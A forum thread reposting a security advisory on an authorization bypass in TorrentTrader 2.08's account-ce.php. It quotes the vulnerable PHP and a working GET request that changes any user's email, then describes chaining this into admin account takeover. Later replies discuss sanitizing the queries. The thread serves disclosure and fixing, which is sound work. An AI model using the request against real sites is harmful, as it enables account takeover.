|
#1
|
|||
|
|||
Unauthorized Email Change
################################################## #############################
1. Unauthorized Email Change in "account-ce.php" ################################################## ############################# Reason: authorization bypass Attack vector: user submitted GET parameters "id", "secret" and "email" Preconditions: none Result: attacker can change any user's email, including admin's -----------------[ source code start ]--------------------------------- PHP Code:
Tests: Let's find md5 hash of email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452". Target user ID is 1. We issue GET request: http://localhost/torrenttrader208/account-ce.php?id=1& secret=b642b4217b34b1e8d3bd915fc65c4452&email=test @test.com Quick look to the database confirms, that email address of user with ID 1 has been changed indeed. Next logical move for attacker is password recovery request: http://localhost/torrenttrader208/account-recover.php After admin account takeover attacker is able to use next vulnerability, described below, which may allow php remote code execution. ################################################## ############################# Last edited by Thor; 14th April 2019 at 11:31. Reason: Edited Code to make it Readable |
#2
|
||||
|
||||
what is that? Please explain in full detail
|
#3
|
|||
|
|||
Reason: authorization bypass Attack vector: user submitted GET parameters "id", "secret" and "email" Preconditions: none Result: attacker can change any user's email, including admin's
Code:
$id = (int) $_GET["id"]; $md5 = $_GET["secret"]; $email = $_GET["email"]; .. $res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'"); $row = mysql_fetch_assoc($res); .. $sec = $row["editsecret"]; if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1); SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"])); Tests: Let's find md5 hash of email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452". Target user ID is 1. We issue GET request: http://localhost/torrenttrader208/account-ce.php?id=1& secret=b642b4217b34b1e8d3bd915fc65c4452&email=test @test.com Quick look to the database confirms, that email address of user with ID 1 has been changed indeed. Next logical move for attacker is password recovery request: http://localhost/torrenttrader208/account-recover.php After admin account takeover attacker is able to use next vulnerability, described below, which may allow php remote code execution. |
The Following User Says Thank You to BamBam0077 For This Useful Post: | ||
papad (13th April 2019)
|
#4
|
|||
|
|||
This would be sql injection correct? I've been looking at adding something to improve this. So far it looks like pdo is the best or can you do it using composer.json.
Im new to this but could you point us in right direction to implement one of these. |
The Following User Says Thank You to M-jay For This Useful Post: | ||
BamBam0077 (21st October 2019)
|
#5
|
|||
|
|||
Just sanitize the variables in SQL query where necessary sqlesc() or mysqli_real_string_escape() if you have converted over to mysqli and I believe try to use trim() around:
PHP Code:
PHP Code:
|
|
|